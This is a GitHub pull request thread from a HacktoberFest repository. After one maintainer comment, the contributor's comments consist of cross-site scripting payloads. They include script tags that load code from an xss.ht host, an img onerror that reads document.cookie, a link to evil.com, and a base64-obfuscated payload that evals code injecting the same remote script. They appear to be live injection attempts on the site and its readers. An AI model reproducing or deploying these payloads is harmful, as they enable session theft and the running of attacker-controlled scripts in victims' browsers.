<?php echo "Stored XSS is sexy but I really <3 RCE"; ?>
piyushgoyal1620/HacktoberFest2021 pull request #72
Opened 2021-10-29 16:25 UTC by choudharyrajritu1

2021-10-31 12:05 UTC, piyushgoyal1620 requested changes
go inside SRC and then python and then Programs and then add your .py file... and write some good description to this file so it will understandable and make an another PR... then I'll merge it...

2022-03-12 08:39 UTC, choudharyrajritu1 commented
<a href="https://evil.com/">
<img src="https://pbs.twimg.com/profile_images/1399220744605761539/wV_A-GVq_400x400.jpg">
        </a>

2022-03-12 08:39 UTC, choudharyrajritu1 commented
"><script src=https://foyouuuu.xss.ht></script>

2022-03-12 08:40 UTC, choudharyrajritu1 commented
""><img src=x onerror=alert(document.cookie)>

2022-03-12 08:40 UTC, choudharyrajritu1 commented
""><script src=https://foyouuuu.xss.ht></script>

2022-03-12 08:40 UTC, choudharyrajritu1 commented
"><script src=https://foyouuuu.xss.ht></script>

2022-03-12 08:41 UTC, choudharyrajritu1 commented
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZm95b3V1dXUueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; onerror=eval(atob(this.id))>

2023-10-03 12:54 UTC, merged